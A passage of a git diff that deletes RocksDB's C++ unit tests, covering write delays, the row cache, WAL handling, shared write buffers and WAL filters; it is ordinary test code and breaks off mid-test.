-  sleeping_task_low.WaitUntilSleeping();
-
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  // shrink level base so L2 will hit soft limit easier.
-  ASSERT_OK(dbfull()->SetOptions({
-      {"max_bytes_for_level_base", "5000"},
-  }));
-
-  Put("", "");
-  Flush();
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task_low.WaitUntilSleeping();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-}
-
-TEST_F(DBTest, LastWriteBufferDelay) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;
-  options.max_write_buffer_number = 4;
-  options.delayed_write_rate = 20000;
-  options.compression = kNoCompression;
-  options.disable_auto_compactions = true;
-  int kNumKeysPerMemtable = 3;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(kNumKeysPerMemtable));
-
-  Reopen(options);
-  test::SleepingBackgroundTask sleeping_task;
-  // Block flushes
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-  sleeping_task.WaitUntilSleeping();
-
-  // Create 3 L0 files, making score of L0 to be 3.
-  for (int i = 0; i < 3; i++) {
-    // Fill one mem table
-    for (int j = 0; j < kNumKeysPerMemtable; j++) {
-      Put(Key(j), "");
-    }
-    ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  }
-  // Inserting a new entry would create a new mem table, triggering slow down.
-  Put(Key(0), "");
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FailWhenCompressionNotSupportedTest) {
-  CompressionType compressions[] = {kZlibCompression, kBZip2Compression,
-                                    kLZ4Compression, kLZ4HCCompression,
-                                    kXpressCompression};
-  for (auto comp : compressions) {
-    if (!CompressionTypeSupported(comp)) {
-      // not supported, we should fail the Open()
-      Options options = CurrentOptions();
-      options.compression = comp;
-      ASSERT_TRUE(!TryReopen(options).ok());
-      // Try if CreateColumnFamily also fails
-      options.compression = kNoCompression;
-      ASSERT_OK(TryReopen(options));
-      ColumnFamilyOptions cf_options(options);
-      cf_options.compression = comp;
-      ColumnFamilyHandle* handle;
-      ASSERT_TRUE(!db_->CreateColumnFamily(cf_options, "name", &handle).ok());
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, RowCache) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.row_cache = NewLRUCache(8192);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 0);
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 0);
-  ASSERT_EQ(Get("foo"), "bar");
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 0);
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 1);
-  ASSERT_EQ(Get("foo"), "bar");
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 1);
-  ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 1);
-}
-
-TEST_F(DBTest, PinnableSliceAndRowCache) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.row_cache = NewLRUCache(8192);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ(Get("foo"), "bar");
-  ASSERT_EQ(
-      reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(),
-      1);
-
-  {
-    PinnableSlice pin_slice;
-    ASSERT_EQ(Get("foo", &pin_slice), Status::OK());
-    ASSERT_EQ(pin_slice.ToString(), "bar");
-    // Entry is already in cache, lookup will remove the element from lru
-    ASSERT_EQ(
-        reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(),
-        0);
-  }
-  // After PinnableSlice destruction element is added back in LRU
-  ASSERT_EQ(
-      reinterpret_cast<LRUCache*>(options.row_cache.get())->TEST_GetLRUSize(),
-      1);
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, DeletingOldWalAfterDrop) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"Test:AllowFlushes", "DBImpl::BGWorkFlush"},
-       {"DBImpl::BGWorkFlush:done", "Test:WaitForFlush"}});
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  Options options = CurrentOptions();
-  options.max_total_wal_size = 8192;
-  options.compression = kNoCompression;
-  options.write_buffer_size = 1 << 20;
-  options.level0_file_num_compaction_trigger = (1 << 30);
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CreateColumnFamilies({"cf1", "cf2"}, options);
-  ASSERT_OK(Put(0, "key1", DummyString(8192)));
-  ASSERT_OK(Put(0, "key2", DummyString(8192)));
-  // the oldest wal should now be getting_flushed
-  ASSERT_OK(db_->DropColumnFamily(handles_[0]));
-  // all flushes should now do nothing because their CF is dropped
-  TEST_SYNC_POINT("Test:AllowFlushes");
-  TEST_SYNC_POINT("Test:WaitForFlush");
-  uint64_t lognum1 = dbfull()->TEST_LogfileNumber();
-  ASSERT_OK(Put(1, "key3", DummyString(8192)));
-  ASSERT_OK(Put(1, "key4", DummyString(8192)));
-  // new wal should have been created
-  uint64_t lognum2 = dbfull()->TEST_LogfileNumber();
-  EXPECT_GT(lognum2, lognum1);
-}
-
-TEST_F(DBTest, UnsupportedManualSync) {
-  DestroyAndReopen(CurrentOptions());
-  env_->is_wal_sync_thread_safe_.store(false);
-  Status s = db_->SyncWAL();
-  ASSERT_TRUE(s.IsNotSupported());
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestWithParam, DBTestWithParam,
-                        ::testing::Combine(::testing::Values(1, 4),
-                                           ::testing::Bool()));
-
-TEST_F(DBTest, PauseBackgroundWorkTest) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000;  // Small write buffer
-  Reopen(options);
-
-  std::vector<port::Thread> threads;
-  std::atomic<bool> done(false);
-  db_->PauseBackgroundWork();
-  threads.emplace_back([&]() {
-    Random rnd(301);
-    for (int i = 0; i < 10000; ++i) {
-      Put(RandomString(&rnd, 10), RandomString(&rnd, 10));
-    }
-    done.store(true);
-  });
-  env_->SleepForMicroseconds(200000);
-  // make sure the thread is not done
-  ASSERT_FALSE(done.load());
-  db_->ContinueBackgroundWork();
-  for (auto& t : threads) {
-    t.join();
-  }
-  // now it's done
-  ASSERT_TRUE(done.load());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_test2.cc b/thirdparty/rocksdb/db/db_test2.cc
deleted file mode 100644
index 30afd5a..0000000
--- a/thirdparty/rocksdb/db/db_test2.cc
+++ /dev/null
@@ -1,2340 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include <atomic>
-#include <cstdlib>
-#include <functional>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/wal_filter.h"
-
-namespace rocksdb {
-
-class DBTest2 : public DBTestBase {
- public:
-  DBTest2() : DBTestBase("/db_test2") {}
-};
-
-class PrefixFullBloomWithReverseComparator
-    : public DBTestBase,
-      public ::testing::WithParamInterface<bool> {
- public:
-  PrefixFullBloomWithReverseComparator()
-      : DBTestBase("/prefix_bloom_reverse") {}
-  virtual void SetUp() override { if_cache_filter_ = GetParam(); }
-  bool if_cache_filter_;
-};
-
-TEST_P(PrefixFullBloomWithReverseComparator,
-       PrefixFullBloomWithReverseComparator) {
-  Options options = last_options_;
-  options.comparator = ReverseBytewiseComparator();
-  options.prefix_extractor.reset(NewCappedPrefixTransform(3));
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions bbto;
-  if (if_cache_filter_) {
-    bbto.no_block_cache = false;
-    bbto.cache_index_and_filter_blocks = true;
-    bbto.block_cache = NewLRUCache(1);
-  }
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyAndReopen(options);
-
-  ASSERT_OK(dbfull()->Put(WriteOptions(), "bar123", "foo"));
-  ASSERT_OK(dbfull()->Put(WriteOptions(), "bar234", "foo2"));
-  ASSERT_OK(dbfull()->Put(WriteOptions(), "foo123", "foo3"));
-
-  dbfull()->Flush(FlushOptions());
-
-  if (bbto.block_cache) {
-    bbto.block_cache->EraseUnRefEntries();
-  }
-
-  unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-  iter->Seek("bar345");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("bar234", iter->key().ToString());
-  ASSERT_EQ("foo2", iter->value().ToString());
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("bar123", iter->key().ToString());
-  ASSERT_EQ("foo", iter->value().ToString());
-
-  iter->Seek("foo234");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("foo123", iter->key().ToString());
-  ASSERT_EQ("foo3", iter->value().ToString());
-
-  iter->Seek("bar");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-}
-
-INSTANTIATE_TEST_CASE_P(PrefixFullBloomWithReverseComparator,
-                        PrefixFullBloomWithReverseComparator, testing::Bool());
-
-TEST_F(DBTest2, IteratorPropertyVersionNumber) {
-  Put("", "");
-  Iterator* iter1 = db_->NewIterator(ReadOptions());
-  std::string prop_value;
-  ASSERT_OK(
-      iter1->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number1 =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-  Put("", "");
-  Flush();
-
-  Iterator* iter2 = db_->NewIterator(ReadOptions());
-  ASSERT_OK(
-      iter2->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number2 =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-  ASSERT_GT(version_number2, version_number1);
-
-  Put("", "");
-
-  Iterator* iter3 = db_->NewIterator(ReadOptions());
-  ASSERT_OK(
-      iter3->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number3 =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-  ASSERT_EQ(version_number2, version_number3);
-
-  iter1->SeekToFirst();
-  ASSERT_OK(
-      iter1->GetProperty("rocksdb.iterator.super-version-number", &prop_value));
-  uint64_t version_number1_new =
-      static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-  ASSERT_EQ(version_number1, version_number1_new);
-
-  delete iter1;
-  delete iter2;
-  delete iter3;
-}
-
-TEST_F(DBTest2, CacheIndexAndFilterWithDBRestart) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Put(1, "a", "begin");
-  Put(1, "z", "end");
-  ASSERT_OK(Flush(1));
-  TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  std::string value;
-  value = Get(1, "a");
-}
-
-TEST_F(DBTest2, MaxSuccessiveMergesChangeWithDBRecovery) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.max_successive_merges = 3;
-  options.merge_operator = MergeOperators::CreatePutOperator();
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  Put("poi", "Finch");
-  db_->Merge(WriteOptions(), "poi", "Reese");
-  db_->Merge(WriteOptions(), "poi", "Shaw");
-  db_->Merge(WriteOptions(), "poi", "Root");
-  options.max_successive_merges = 2;
-  Reopen(options);
-}
-
-#ifndef ROCKSDB_LITE
-class DBTestSharedWriteBufferAcrossCFs
-    : public DBTestBase,
-      public testing::WithParamInterface<std::tuple<bool, bool>> {
- public:
-  DBTestSharedWriteBufferAcrossCFs()
-      : DBTestBase("/db_test_shared_write_buffer") {}
-  void SetUp() override {
-    use_old_interface_ = std::get<0>(GetParam());
-    cost_cache_ = std::get<1>(GetParam());
-  }
-  bool use_old_interface_;
-  bool cost_cache_;
-};
-
-TEST_P(DBTestSharedWriteBufferAcrossCFs, SharedWriteBufferAcrossCFs) {
-  Options options = CurrentOptions();
-  options.arena_block_size = 4096;
-
-  // Avoid undeterministic value by malloc_usable_size();
-  // Force arena block size to 1
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::Arena:0", [&](void* arg) {
-        size_t* block_size = static_cast<size_t*>(arg);
-        *block_size = 1;
-      });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::AllocateNewBlock:0", [&](void* arg) {
-        std::pair<size_t*, size_t*>* pair =
-            static_cast<std::pair<size_t*, size_t*>*>(arg);
-        *std::get<0>(*pair) = *std::get<1>(*pair);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // The total soft write buffer size is about 105000
-  std::shared_ptr<Cache> cache = NewLRUCache(4 * 1024 * 1024, 2);
-  ASSERT_LT(cache->GetUsage(), 1024 * 1024);
-
-  if (use_old_interface_) {
-    options.db_write_buffer_size = 120000;  // this is the real limit
-  } else if (!cost_cache_) {
-    options.write_buffer_manager.reset(new WriteBufferManager(114285));
-  } else {
-    options.write_buffer_manager.reset(new WriteBufferManager(114285, cache));
-  }
-  options.write_buffer_size = 500000;  // this is never hit
-  CreateAndReopenWithCF({"pikachu", "dobrynia", "nikitich"}, options);
-
-  WriteOptions wo;
-  wo.disableWAL = true;
-
-  std::function<void()> wait_flush = [&]() {
-    dbfull()->TEST_WaitForFlushMemTable(handles_[0]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[3]);
-  };
-
-  // Create some data and flush "default" and "nikitich" so that they
-  // are newer CFs created.
-  ASSERT_OK(Put(3, Key(1), DummyString(1), wo));
-  Flush(3);
-  ASSERT_OK(Put(3, Key(1), DummyString(1), wo));
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  Flush(0);
-  ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-            static_cast<uint64_t>(1));
-  ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-            static_cast<uint64_t>(1));
-
-  ASSERT_OK(Put(3, Key(1), DummyString(30000), wo));
-  if (cost_cache_) {
-    ASSERT_GE(cache->GetUsage(), 1024 * 1024);
-    ASSERT_LE(cache->GetUsage(), 2 * 1024 * 1024);
-  }
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(60000), wo));
-  if (cost_cache_) {
-    ASSERT_GE(cache->GetUsage(), 1024 * 1024);
-    ASSERT_LE(cache->GetUsage(), 2 * 1024 * 1024);
-  }
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  // No flush should trigger
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(1));
-  }
-
-  // Trigger a flush. Flushing "nikitich".
-  ASSERT_OK(Put(3, Key(2), DummyString(30000), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  // Without hitting the threshold, no flush should trigger.
-  ASSERT_OK(Put(2, Key(1), DummyString(30000), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  // Hit the write buffer limit again. "default"
-  // will have been flushed.
-  ASSERT_OK(Put(2, Key(2), DummyString(10000), wo));
-  wait_flush();
-  ASSERT_OK(Put(3, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(2));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  // Trigger another flush. This time "dobrynia". "pikachu" should not
-  // be flushed, althrough it was never flushed.
-  ASSERT_OK(Put(1, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(80000), wo));
-  wait_flush();
-  ASSERT_OK(Put(1, Key(1), DummyString(1), wo));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(2));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-  if (cost_cache_) {
-    ASSERT_GE(cache->GetUsage(), 1024 * 1024);
-    Close();
-    options.write_buffer_manager.reset();
-    ASSERT_LT(cache->GetUsage(), 1024 * 1024);
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestSharedWriteBufferAcrossCFs,
-                        DBTestSharedWriteBufferAcrossCFs,
-                        ::testing::Values(std::make_tuple(true, false),
-                                          std::make_tuple(false, false),
-                                          std::make_tuple(false, true)));
-
-TEST_F(DBTest2, SharedWriteBufferLimitAcrossDB) {
-  std::string dbname2 = test::TmpDir(env_) + "/db_shared_wb_db2";
-  Options options = CurrentOptions();
-  options.arena_block_size = 4096;
-  // Avoid undeterministic value by malloc_usable_size();
-  // Force arena block size to 1
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::Arena:0", [&](void* arg) {
-        size_t* block_size = static_cast<size_t*>(arg);
-        *block_size = 1;
-      });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Arena::AllocateNewBlock:0", [&](void* arg) {
-        std::pair<size_t*, size_t*>* pair =
-            static_cast<std::pair<size_t*, size_t*>*>(arg);
-        *std::get<0>(*pair) = *std::get<1>(*pair);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  options.write_buffer_size = 500000;  // this is never hit
-  // Use a write buffer total size so that the soft limit is about
-  // 105000.
-  options.write_buffer_manager.reset(new WriteBufferManager(120000));
-  CreateAndReopenWithCF({"cf1", "cf2"}, options);
-
-  ASSERT_OK(DestroyDB(dbname2, options));
-  DB* db2 = nullptr;
-  ASSERT_OK(DB::Open(options, dbname2, &db2));
-
-  WriteOptions wo;
-  wo.disableWAL = true;
-
-  std::function<void()> wait_flush = [&]() {
-    dbfull()->TEST_WaitForFlushMemTable(handles_[0]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-    static_cast<DBImpl*>(db2)->TEST_WaitForFlushMemTable();
-  };
-
-  // Trigger a flush on cf2
-  ASSERT_OK(Put(2, Key(1), DummyString(70000), wo));
-  wait_flush();
-  ASSERT_OK(Put(0, Key(1), DummyString(20000), wo));
-  wait_flush();
-
-  // Insert to DB2
-  ASSERT_OK(db2->Put(wo, Key(2), DummyString(20000)));
-  wait_flush();
-
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  static_cast<DBImpl*>(db2)->TEST_WaitForFlushMemTable();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default") +
-                  GetNumberOfSstFilesForColumnFamily(db_, "cf1") +
-                  GetNumberOfSstFilesForColumnFamily(db_, "cf2"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db2, "default"),
-              static_cast<uint64_t>(0));
-  }
-
-  // Triggering to flush another CF in DB1
-  ASSERT_OK(db2->Put(wo, Key(2), DummyString(70000)));
-  wait_flush();
-  ASSERT_OK(Put(2, Key(1), DummyString(1), wo));
-  wait_flush();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf1"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf2"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db2, "default"),
-              static_cast<uint64_t>(0));
-  }
-
-  // Triggering flush in DB2.
-  ASSERT_OK(db2->Put(wo, Key(3), DummyString(40000)));
-  wait_flush();
-  ASSERT_OK(db2->Put(wo, Key(1), DummyString(1)));
-  wait_flush();
-  static_cast<DBImpl*>(db2)->TEST_WaitForFlushMemTable();
-  {
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf1"),
-              static_cast<uint64_t>(0));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "cf2"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db2, "default"),
-              static_cast<uint64_t>(1));
-  }
-
-  delete db2;
-  ASSERT_OK(DestroyDB(dbname2, options));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-namespace {
-  void ValidateKeyExistence(DB* db, const std::vector<Slice>& keys_must_exist,
-    const std::vector<Slice>& keys_must_not_exist) {
-    // Ensure that expected keys exist
-    std::vector<std::string> values;
-    if (keys_must_exist.size() > 0) {
-      std::vector<Status> status_list =
-        db->MultiGet(ReadOptions(), keys_must_exist, &values);
-      for (size_t i = 0; i < keys_must_exist.size(); i++) {
-        ASSERT_OK(status_list[i]);
-      }
-    }
-
-    // Ensure that given keys don't exist
-    if (keys_must_not_exist.size() > 0) {
-      std::vector<Status> status_list =
-        db->MultiGet(ReadOptions(), keys_must_not_exist, &values);
-      for (size_t i = 0; i < keys_must_not_exist.size(); i++) {
-        ASSERT_TRUE(status_list[i].IsNotFound());
-      }
-    }
-  }
-
-}  // namespace
-
-TEST_F(DBTest2, WalFilterTest) {
-  class TestWalFilter : public WalFilter {
-  private:
-    // Processing option that is requested to be applied at the given index
-    WalFilter::WalProcessingOption wal_processing_option_;
-    // Index at which to apply wal_processing_option_
-    // At other indexes default wal_processing_option::kContinueProcessing is
-    // returned.
-    size_t apply_option_at_record_index_;
-    // Current record index, incremented with each record encountered.
-    size_t current_record_index_;
-
-  public:
-    TestWalFilter(WalFilter::WalProcessingOption wal_processing_option,
-      size_t apply_option_for_record_index)
-      : wal_processing_option_(wal_processing_option),
-      apply_option_at_record_index_(apply_option_for_record_index),
-      current_record_index_(0) {}
-
-    virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) const override {
-      WalFilter::WalProcessingOption option_to_return;
-
-      if (current_record_index_ == apply_option_at_record_index_) {
-        option_to_return = wal_processing_option_;
-      }
-      else {
-        option_to_return = WalProcessingOption::kContinueProcessing;
-      }
-
-      // Filter is passed as a const object for RocksDB to not modify the
-      // object, however we modify it for our own purpose here and hence
-      // cast the constness away.
-      (const_cast<TestWalFilter*>(this)->current_record_index_)++;
-
-      return option_to_return;
-    }
-
-    virtual const char* Name() const override { return "TestWalFilter"; }
-  };
-
-  // Create 3 batches with two keys each
-  std::vector<std::vector<std::string>> batch_keys(3);
-
-  batch_keys[0].push_back("key1");
-  batch_keys[0].push_back("key2");
-  batch_keys[1].push_back("key3");
-  batch_keys[1].push_back("key4");
-  batch_keys[2].push_back("key5");
-  batch_keys[2].push_back("key6");
-
-  // Test with all WAL processing options
-  for (int option = 0;
-    option < static_cast<int>(
-    WalFilter::WalProcessingOption::kWalProcessingOptionMax);
-  option++) {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({ "pikachu" }, options);
-
-    // Write given keys in given batches
-    for (size_t i = 0; i < batch_keys.size(); i++) {
-      WriteBatch batch;
-      for (size_t j = 0; j < batch_keys[i].size(); j++) {
-        batch.Put(handles_[0], batch_keys[i][j], DummyString(1024));
-      }
-      dbfull()->Write(WriteOptions(), &batch);
-    }
-
-    WalFilter::WalProcessingOption wal_processing_option =
-      static_cast<WalFilter::WalProcessingOption>(option);
-
-    // Create a test filter that would apply wal_processing_option at the first
-    // record
-    size_t apply_option_for_record_index = 1;
-    TestWalFilter test_wal_filter(wal_processing_option,
-      apply_option_for_record_index);
-
-    // Reopen database with option to use WAL filter
-    options = OptionsForLogIterTest();
-    options.wal_filter = &test_wal_filter;
-    Status status =
-      TryReopenWithColumnFamilies({ "default", "pikachu" }, options);
-    if (wal_processing_option ==
-      WalFilter::WalProcessingOption::kCorruptedRecord) {
-      assert(!status.ok());
-      // In case of corruption we can turn off paranoid_checks to reopen
-      // databse
-      options.paranoid_checks = false;
-      ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-    }
-    else {
-      assert(status.ok());
-    }
-
-    // Compute which keys we expect to be found
-    // and which we expect not to be found after recovery.
-    std::vector<Slice> keys_must_exist;
-    std::vector<Slice> keys_must_not_exist;
-    switch (wal_processing_option) {
-    case WalFilter::WalProcessingOption::kCorruptedRecord:
-    case WalFilter::WalProcessingOption::kContinueProcessing: {
-      fprintf(stderr, "Testing with complete WAL processing\n");
-      // we expect all records to be processed
-      for (size_t i = 0; i < batch_keys.size(); i++) {
-        for (size_t j = 0; j < batch_keys[i].size(); j++) {
-          keys_must_exist.push_back(Slice(batch_keys[i][j]));
-        }
-      }
-      break;
-    }
-    case WalFilter::WalProcessingOption::kIgnoreCurrentRecord: {
-      fprintf(stderr,
-        "Testing with ignoring record %" ROCKSDB_PRIszt " only\n",
-        apply_option_for_record_index);
-      // We expect the record with apply_option_for_record_index to be not
-      // found.
-      for (size_t i = 0; i < batch_keys.size(); i++) {
-        for (size_t j = 0; j < batch_keys[i].size(); j++) {
-          if (i == apply_option_for_record_index) {
-            keys_must_not_exist.push_back(Slice(batch_keys[i][j]));
-          }
-          else {
-            keys_must_exist.push_back(Slice(batch_keys[i][j]));
-          }
-        }
-      }
-      break;
-    }
-    case WalFilter::WalProcessingOption::kStopReplay: {
-      fprintf(stderr,
-        "Testing with stopping replay from record %" ROCKSDB_PRIszt
-        "\n",
-        apply_option_for_record_index);
-      // We expect records beyond apply_option_for_record_index to be not
